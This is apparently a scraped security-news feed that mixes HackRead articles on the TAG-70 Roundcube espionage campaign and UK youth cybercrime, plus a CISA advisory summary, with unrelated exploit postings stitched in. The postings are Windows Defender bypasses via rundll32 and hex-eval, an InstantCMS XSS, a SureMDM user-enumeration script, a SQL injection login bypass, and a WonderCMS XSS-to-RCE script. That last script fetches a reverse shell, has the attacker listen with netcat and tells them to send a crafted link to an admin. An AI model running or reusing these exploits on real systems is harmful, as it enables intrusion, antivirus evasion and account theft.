By Deeba Ahmed
Email servers compromised in 80 organizations as Russian-linked TAG-70 group targets European governments.
This is a post from HackRead.com Read the original post: Russian Hackers Hit Mail Servers in Europe for Political and Military Intel

A Russian-linked actor, TAG-70, has targeted mail servers in Ukraine, Georgia, and Poland, aiming to collect intelligence on European political and military activities, particularly related to Ukraine’s war efforts.

Recorded Future’s Insikt Group has identified TAG-70, a potential threat actor allegedly working for Belarus and Russia, targeting government, military, and infrastructure entities across Europe and Central Asia since December 2020. The latest round of attacks was observed between October and December 2023.

The group is also known as Winter Vivern, TA-473, and UAC-0114. According to Insikt Group’s report (PDF), Tag-70 was discovered exploiting cross-site scripting (XSS) vulnerabilities in Roundcube webmail servers across Europe.

The group mainly targeted government, military, and national infrastructure in Georgia, Poland, and Ukraine whereas targets were also observed in Belgium, France, the Czech Republic, Germany, and the UK. 

TAG-70, reportedly, used social engineering techniques to gain unauthorized access to mail servers across 80 organizations, including the Iranian Embassies in Moscow and the Netherlands, and the Georgia Embassy in Sweden.

The campaign aimed to gather intelligence on European political and military affairs, potentially gaining strategic advantages or undermining European security and alliances. Servers were primarily affected in Ukraine (30.9%), Georgia (13.6%), and Poland (12.3%)

The geographical distribution of victims affected by the TAG-70s Roundcube exploit in October 2023, according to Recorded Future.

This espionage attack uses spearphishing emails to deliver JavaScript payloads, exploiting the Roundcube vulnerability tracked as CVE-2023-563. Malicious code logs users out of Roundcube, presenting a new sign-in window.

The zero-day exploit allowed unauthorized access to mail servers across 80 organizations, including transport, education, chemical, and biological research sectors. The activity is similar to previous campaigns by other Russian-aligned threat groups like BlueDelta and Sandworm, which also targeted email solutions like Roundcube.

The compromised email servers pose a significant risk to Ukraine’s war effort, diplomatic relations, and coalition partners. Researchers warn that cyber-espionage groups targeting webmail software platforms, including Roundcube, may expose sensitive information about Ukraine’s defence efforts, partner countries, and third-party cooperation. They predict that these groups will continue targeting these platforms as Ukraine’s conflict continues and tensions with the EU and NATO rise.

Organizations must patch Roundcube installations, detect indicators of compromise (IoCs), and implement robust cybersecurity measures to mitigate the threat. Other effective security measures include strengthening email security, preferring encryption, secure email gateways, regular audits, employee awareness training, and network segmentation. The sophisticated attack methods and potential national security impact highlight the need for vigilance and awareness.

****RELATED ARTICLES****

1.  **Microsoft Executives’ Emails Breached by Russia Hackers**
2.  **Russian Hackers Employ Telekopye Toolkit in Phishing Attacks**
3.  **Russian APT29 Hacked US Biomedical Giant in TeamCity Breach**
4.  **Microsoft Outlook Flaw Exploited by Russian Forest Blizzard Group**
5.  **Russian Midnight Blizzard Hackers Hit MS Teams in Precision Attack**

Russian Hackers Hit Mail Servers in Europe for Political and Military Intel

CISA has issued an advisory after the discovery of documents containing information about a state government organization’s network environment on a dark web brokerage site.

CISA (the Cybersecurity & Infrastructure Security Agency) has issued a cybersecurity advisory after the discovery of documents containing host and user information of a state government organization’s network environment—including metadata—on a dark web brokerage site.

An attacker managed to compromise network administrator credentials through the account of a former employee of the organization. The attacker managed to authenticate to an internal virtual private network (VPN) access point, further navigate the victim’s on-premises environment, and execute various lightweight directory access protocol (LDAP) queries against a domain controller.

CISA suspects that the account details fell in the hands of the attacker through a data breach. This would not have posed a problem if the account had been disabled when the employee left. But the account still had access with administrative privileges to two virtualized servers including SharePoint and the workstation.

The incident responders’ logs revealed the attacker first connected from an unknown virtual machine (VM) to the victim’s on-premises environment via internet protocol (IP) addresses within their internal VPN range.

On the SharePoint server, the attacker obtained global domain administrator credentials that were stored locally on the server. This account also provided the attacker with access to the on-premises Active Directory (AD) and Azure AD.

The attacker executed LDAP queries to collect user, host, and trust relationship information. The results of these queries are believed to have been among the information that was offered for sale.

**Mitigation advice**

When an employee leaves there may be several possible reasons not to immediately remove all their accounts. But you should at least remove their privileges as soon as possible and change the password.

The CISA advisory lists several points of advice about user accounts:

*   Review current administrator accounts and only maintain those that are essential for network management.
*   Restrict the use of multiple administrator accounts for one user.
*   Create separate administrator accounts for on-premises and Azure environments to segment access.
*   Implement the principle of least privilege and grant only access to what is necessary. It makes sense to revoke privileges after the task they were needed for is done.
*   Use phishing-resistant multifactor authentication (MFA). The only widely available phishing-resistant authentication is FIDO/WebAuthn authentication.

More general tips are:

*   **Account and group policies**: Set up a robust and continuous user management process to ensure accounts of offboarded employees are removed and can no longer access the network.
*   **Awareness of your environment**: Maintain a robust asset management policy through comprehensive documentation of assets, tracking current version information to maintain awareness of outdated software, and mapping assets to business and critical functions.
*   **Patching procedures**: If you do not have a Vulnerability and Patch Management solution, establish a routine patching cycle for all operating systems, applications, and software.
*   **Monitoring and logging**: It’s essential to keep an eye on what is happening in your environment so you are aware of atypical events and logs that can help you figure out what happened exactly.

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

 Why keeping track of user accounts is important 

Back in 2022, the researcher released a proof of concept to bypass the Backdoor:JS/Relvelshe.A detection in Windows Defender but it no longer works as it was mitigated. However, adding a simple javascript try catch error statement and eval'ing the hex string, it executes as of the time of this post.

**Microsoft Windows Defender / Backdoor\_JS.Relvelshe.A Detection / Mitigation Bypass**

    [+] Credits: John Page (aka hyp3rlinx)    [+] Website: hyp3rlinx.altervista.org[+] Source:  https://hyp3rlinx.altervista.org/advisories/Windows_Defender_Backdoor_JS.Relvelshe.A_Detection_Mitigation_Bypass.txt[+] twitter.com/hyp3rlinx[+] ISR: ApparitionSec      [Vendor]www.microsoft.com[Product]Windows Defender[Vulnerability Type]Detection Mitigation Bypass Backdoor:JS/Relvelshe.A[CVE Reference]N/A[Security Issue]Back in 2022 I released a PoC to bypass the Backdoor:JS/Relvelshe.A detection in defender but it no longer works as was mitigated.However, adding a simple javascript try catch error statement and eval the hex string it executes as of the time of this post.[References]https://twitter.com/hyp3rlinx/status/1480657623947091968[Exploit/POC]1) python -m http.server 802) Open command prompt as Administrator3) rundll32  javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://localhost/yo.tmp")Create file and host on server, this is contents of the "yo.tmp" file.<?xml version="1.0"?><component><script>try{<![CDATA[var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";var str = '';for (var n = 0; n < hex.length; n += 2) {str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));}eval(str)]]>}catch(e){eval(str)}</script></component>[Network Access]Local[Severity]High[Disclosure Timeline]Vendor Notification:  February 18, 2024: Public Disclosure[+] DisclaimerThe information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, andthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due creditis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibilityfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related informationor exploits by the author or elsewhere. All content (c).hyp3rlinx

Microsoft Windows Defender / Backdoor_JS.Relvelshe.A Detection / Mitigation Bypass

This is additional research regarding a mitigation bypass in Windows Defender. Back in 2022, the researcher disclosed how it could be easily bypassed by passing an extra path traversal when referencing mshtml but that issue has since been mitigated. However, the researcher discovered using multiple commas can also be used to achieve the bypass. This issue was addressed. The fix was short lived as the researcher found yet another third trivial bypass. Previously, the researcher disclosed 3 bypasses using rundll32 javascript, but this example leverages the VBSCRIPT and ActiveX engines.

    [+] Credits: John Page (aka hyp3rlinx)    [+] Website: hyp3rlinx.altervista.org[+] Source:  https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_VBSCRIPT_TROJAN_MITIGATION_BYPASS.txt[+] twitter.com/hyp3rlinx[+] ISR: ApparitionSec      [Vendor]www.microsoft.com[Product]Windows Defender[Vulnerability Type]Windows Defender VBScript Detection Mitigation BypassTrojanWin32Powessere.G[CVE Reference]N/A[Security Issue]Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution failand attackers will typically get an "Access is denied" error message. Previously I have disclosed 3 bypasses using rundll32 javascript, this example leverages VBSCRIPT and ActiveX engine.Running rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0), will typically get blocked by Windows Defender withan "Access is denied" message.Trojan:Win32/Powessere.GCategory: TrojanThis program is dangerous and executes commands from an attacker.However, you can add arbitrary text for the 2nd mshtml parameter to build off my previous javascript based bypasses to skirt defender detection.Example, adding "shtml", "Lol" or other text and it will execute as of the time of this writing.E.g.C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\PWN\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)[References]https://twitter.com/hyp3rlinx/status/1759260962761150468https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txthttps://lolbas-project.github.io/lolbas/Binaries/Rundll32/[Exploit/POC]Open command prompt as AdministratorC:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)Access is denied.C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\LoL\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)We win![Network Access]Local[Severity]High[Disclosure Timeline]Vendor Notification:  February 18, 2024 : Public Disclosure[+] DisclaimerThe information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, andthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due creditis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibilityfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related informationor exploits by the author or elsewhere. All content (c).hyp3rlinx

Microsoft Windows Defender / Trojan.Win32/Powessere.G VBScript Detection Bypass

InstantCMS version 2.16.1 suffers from a persistent cross site scripting vulnerability that appears to require administrative access.

    # Exploit Title: InstantCMS - Store XSS# Application: InstantCMS # Version: v2.16.1   # Bugs: Stored XSS# Technology: PHP# Vendor Homepage: https://instantcms.ru/# Software Link: https://instantcms.ru/get# Date: 14.09.2023# Author: SoSPiro# Tested on: Windows## DescriptionI noticed that you filtered the filter very carefully. But there are still some parts you missed## POC1 . Login with admin2 . Go to "http://localhost/o2/admin/menu/item_edit/18"3 . Insert payload in CSS class4 . Click save , and go to home page, and Detect store xss in footerhttps://drive.google.com/file/d/1_9QGoBnbZZrsHUgNkujja1Ptj3f8fl2W/view?usp=sharing## ImpactThis security vulnerability has the potential to steal multiple users' cookies, gain unauthorized access to that user's account through stolen cookies, or redirect the user to other malicious websites...## Bug fix commithttps://github.com/instantsoft/icms2/commit/b2172a0f842fc28966b00bab3e2e9094c6bfd156## Referencehttps://huntr.com/bounties/18546c85-de6a-4252-a02f-c9d26f4f775e/

InstantCMS 2.16.1 Cross Site Scripting

SureMDM On-Premise versions prior to 6.31 suffer from CAPTCHA bypass and user enumeration vulnerabilities.

    # Exploit Title: SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration# Date: 05/12/2023# Exploit Author: Jonas Benjamin Friedli# Vendor Homepage: https://www.42gears.com/products/mobile-device-management/# Version: <= 6.31# Tested on: 6.31# CVE : CVE-2023-3897import requestsimport sysdef print_help():    print("Usage: python script.py [URL] [UserListFile]")    sys.exit(1)def main():    if len(sys.argv) != 3 or sys.argv[1] == '-h':        print_help()    url, user_list_file = sys.argv[1], sys.argv[2]    try:        with open(user_list_file, 'r') as file:            users = file.read().splitlines()    except FileNotFoundError:        print(f"User list file '{user_list_file}' not found.")        sys.exit(1)    valid_users = []    bypass_dir = "/ForgotPassword.aspx/ForgetPasswordRequest"    enumerate_txt = "This User ID/Email ID is not registered."    for index, user in enumerate(users):        progress = (index + 1) / len(users) * 100        print(f"Processing {index + 1}/{len(users)} users ({progress:.2f}%)", end="\r")        data = {"UserId": user}        response = requests.post(            f"{url}{bypass_dir}",            json=data,            headers={"Content-Type": "application/json; charset=utf-8"}        )        if response.status_code == 200:            response_data = response.json()            if enumerate_txt not in response_data.get('d', {}).get('message', ''):                valid_users.append(user)    print("\nFinished processing users.")    print(f"Valid Users Found: {len(valid_users)}")    for user in valid_users:        print(user)if __name__ == "__main__":    main()

SureMDM On-Premise CAPTCHA Bypass / User Enumeration

By Waqas
One in five children aged 10-16 in the UK have engaged in online activities that violate the Computer Misuse Act, NCA has revealed.
This is a post from HackRead.com Read the original post: 1 in 5 Youth Engage in Cybercrime, NCA Finds

A recent report by the National Crime Agency (NCA) has revealed a disturbing trend: one in five children aged 10-16 in the UK have engaged in online activities that violate the Computer Misuse Act. This raises serious concerns about the increasing prevalence of cybercrime among young people and stresses the urgent need for greater awareness and education.

The report, based on a comprehensive survey, highlights several concerning online behaviours, including:

*   **Unauthorized access to computer systems or data:** This encompasses hacking into someone else’s account, downloading illegal software, or accessing restricted information.
*   **Cyberbullying and harassment:** Online harassment and bullying can have severe consequences for both the victim and the perpetrator, inflicting emotional distress and potentially leading to real-world harm.
*   **Copyright infringement:** Downloading or sharing copyrighted material without permission, such as music, movies, or software, is illegal and can have legal repercussions.
*   **Online gaming offenses:** This encompasses activities like making in-game purchases without permission, using cheats or hacks to gain an unfair advantage, or engaging in distributed denial-of-service (DDoS) attacks that disrupt online services.

The NCA emphasizes that many children may unknowingly engage in these activities, unaware of the legal implications and potential consequences. This underlines the critical need for open communication between parents, educators, and children about online safety and responsible behaviour.

The report also stresses the importance of proactive education and awareness campaigns targeted at both children and adults. Educating young people about cybercrime, its various forms, and the legal ramifications associated with it can significantly deter them from engaging in risky online behaviour.

Furthermore, the NCA advocates for promoting positive alternatives to encourage children to engage in safe and productive online activities. This can involve fostering their interest in educational resources, creative pursuits, and responsible online communities.

While the report paints a concerning picture, it is crucial to remember that not all online activity by children is illegal. It is essential to distinguish between harmless exploration and deliberate malicious intent based on the specific details and context surrounding each case.

> _“Many young people are getting involved in cybercrime without realising that they are breaking the law. Our message to these teenagers is simple – don’t play games with your future. Whether you engage in this behaviour knowingly or without realising, you are committing an offence – and could face serious consequences for your actions.”_
> 
> _“We’d encourage any concerned parents and teachers to speak to young people with an interest in tech, help them understand the dangers, and highlight the many rewarding and varied careers available to them. Our Cyber Choices team are here to help children, teachers and parents with advice and guidance.”_
> 
> Paul Foster – NCA Deputy Director and Head of the National Cyber Crime Unit

The NCA’s report should be a wake-up call, urging parents, educators, and policymakers to work collaboratively to address the growing issue of cybercrime among young people. By fostering open communication, promoting education and awareness, and encouraging responsible online behaviour, we can create a safer and more positive digital environment for future generations.

_**Editor’s Note:** We must have open and honest conversations with young people about their online activities. We need to educate them about the potential risks and consequences of their actions and equip them with the knowledge and skills to navigate the online world safely and responsibly._

1.  **Kids breach and bypass Linux Mint screensaver lock**
2.  **Snapchat Safety for Parents: How to Safeguard Your Child**
3.  **13-year-old student arrested for hacking school computers**
4.  **Utilizing Programmatic Advertising to Locate Abducted Children**
5.  **Gender Diversity in Cybercrime Forums: Women Users on the Rise**

1 in 5 Youth Engage in Cybercrime, NCA Finds

Online Library Management System version 3 suffers from a password reset vulnerability due to a logic flaw of allowing the same email address to be set for multiple users.

    # Exploit Title: Online Library Management System v3 - Password Reset and Email Matching Vulnerability# Date: 12.09.2023# Exploit Author: SoSPiro# Vendor Homepage: https://phpgurukul.com/# Software Link: https://phpgurukul.com/online-library-management-system/# Version: v3# Tested on: Windows 10 Pro 64 Bit  + Wampserver V3.3# CVE: N/A## Description:This report outlines a security vulnerability present in the web application called [Application Name]. This vulnerability allows users to create multiple accounts with the same email address and use that email address during the password reset process. This situation can compromise the security of user accounts.## Risk Level:This vulnerability can lead to serious security risks, including unauthorized access to user accounts and identity theft. It has the potential to have a significant impact.## Step-by-Step Description:1. User creates an account as "user1," with the email address set as "user@gmail.com."2. User creates another account as "user2" and uses the same email address, "user@gmail.com."3. User2 initiates a password reset process when forgetting the password.4. As a result of the password reset process, the password for the "user1" account is also reset and can be controlled by "user2."

Online Library Management System 3 Password Reset

Employee Management System version 1.0 suffers from a remote SQL injection vulnerability. Original discovery of this finding is attributed to Ozlem Balci in January of 2024.

# Exploit Title: Employee Management System - SQL Injection  
# Google Dork: N/A  
# Application: Employee Management System   
# Date: 19.02.2024  
# Bugs: SQL Injection   
# Exploit Author: SoSPiro  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html  
# Version: N/A  
# Tested on: Windows 10 64 bit Wampserver   
# CVE : N/A

## Vulnerability Description:

In your code, there is a potential SQL injection vulnerability due to directly incorporating user-provided data into the SQL query used for user login. This situation increases the risk of SQL injection attacks where malicious users may input inappropriate data to potentially harm your database or steal sensitive information.

## Proof of Concept (PoC):

An example attacker could input the following into the email field instead of a valid email address:

In this case, the SQL query would look like:

SELECT * FROM users WHERE email='' OR '1'='1' --' AND password = '' AND status = 'Active'  
As "1=1" is always true, the query would return positive results, allowing the attacker to log in.

## Vulnerable code section:  
====================================================  
employee/Admin/login.php

<?php  
session_start();  
error_reporting(1);  
include('../connect.php');

//Get website details  
$sql_website = "select * from website_setting";   
$result_website = $conn->query($sql_website);  
$row_website = mysqli_fetch_array($result_website);

if(isset($_POST['btnlogin'])){

//Get Date  
date_default_timezone_set('Africa/Lagos');  
$current_date = date('Y-m-d h:i:s');

$email = $_POST['txtemail'];  
$password = $_POST['txtpassword'];  
$status = 'Active';

 $sql = "SELECT * FROM users WHERE email='" .$email. "' and password = '".$password."'  and status = '".$status."'";  
  $result = mysqli_query($conn, $sql);

if (mysqli_num_rows($result) > 0) {  
  // output data of each row  
 ($row = mysqli_fetch_assoc($result));  
   $_SESSION["email"] = $row['email'];  
   $_SESSION["password"] = $row['password'];  
 $_SESSION["phone"] = $row['phone'];  
    $firstname = $row['firstname'];  
     $_SESSION["firstname"] = $row['firstname'];

     $fa = $row['2FA'];

  }

Employee Management System 1.0 SQL Injection

WonderCMS version 4.3.2 remote exploit that leverages cross site scripting to achieve remote code execution.

    # Author: prodigiousMind# Exploit: Wondercms 4.3.2 XSS to RCEimport sysimport requestsimport osimport bs4if (len(sys.argv)<4): print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252")else:  data = '''var url = "'''+str(sys.argv[1])+'''";if (url.endsWith("/")) { url = url.slice(0, -1);}var urlWithoutLog = url.split("/").slice(0, -1).join("/");var urlWithoutLogBase = new URL(urlWithoutLog).pathname; var token = document.querySelectorAll('[name="token"]')[0].value;var urlRev = urlWithoutLogBase+"/?installModule=https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip&directoryName=violet&type=themes&token=" + token;var xhr3 = new XMLHttpRequest();xhr3.withCredentials = true;xhr3.open("GET", urlRev);xhr3.send();xhr3.onload = function() { if (xhr3.status == 200) {   var xhr4 = new XMLHttpRequest();   xhr4.withCredentials = true;   xhr4.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php");   xhr4.send();   xhr4.onload = function() {     if (xhr4.status == 200) {       var ip = "'''+str(sys.argv[2])+'''";       var port = "'''+str(sys.argv[3])+'''";       var xhr5 = new XMLHttpRequest();       xhr5.withCredentials = true;       xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port);       xhr5.send();            }   }; }};'''  try:    open("xss.js","w").write(data)    print("[+] xss.js is created")    print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3]))    print("----------------------------\n")    XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+":8000/xss.js\"></script><form+action=\""    XSSlink = XSSlink.strip(" ")    print("send the below link to admin:\n\n----------------------------\n"+XSSlink)    print("----------------------------\n")    print("\nstarting HTTP server to allow the access to xss.js")    os.system("python3 -m http.server\n")  except: print(data,"\n","//write this to a file")

Tag

#auth